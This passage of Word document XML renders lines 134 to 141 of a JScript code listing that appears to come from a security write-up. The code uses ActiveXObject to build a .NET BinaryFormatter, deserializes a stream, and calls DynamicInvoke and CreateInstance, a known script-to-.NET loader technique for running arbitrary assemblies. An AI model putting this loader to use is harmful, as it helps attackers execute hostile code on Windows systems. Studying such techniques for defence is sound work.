      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ActiveXObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'System.Runtime.Serialization.Formatter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>s.Binary.BinaryFormatter'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>135</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ActiveXObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'System.Collections.ArrayList'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="32"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="31"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="31"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Deserialize_2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>137</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="1609" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>138</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DynamicInvoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ToArray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CreateInstance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>entry_class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="28" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>141</w:t>
      </w:r>
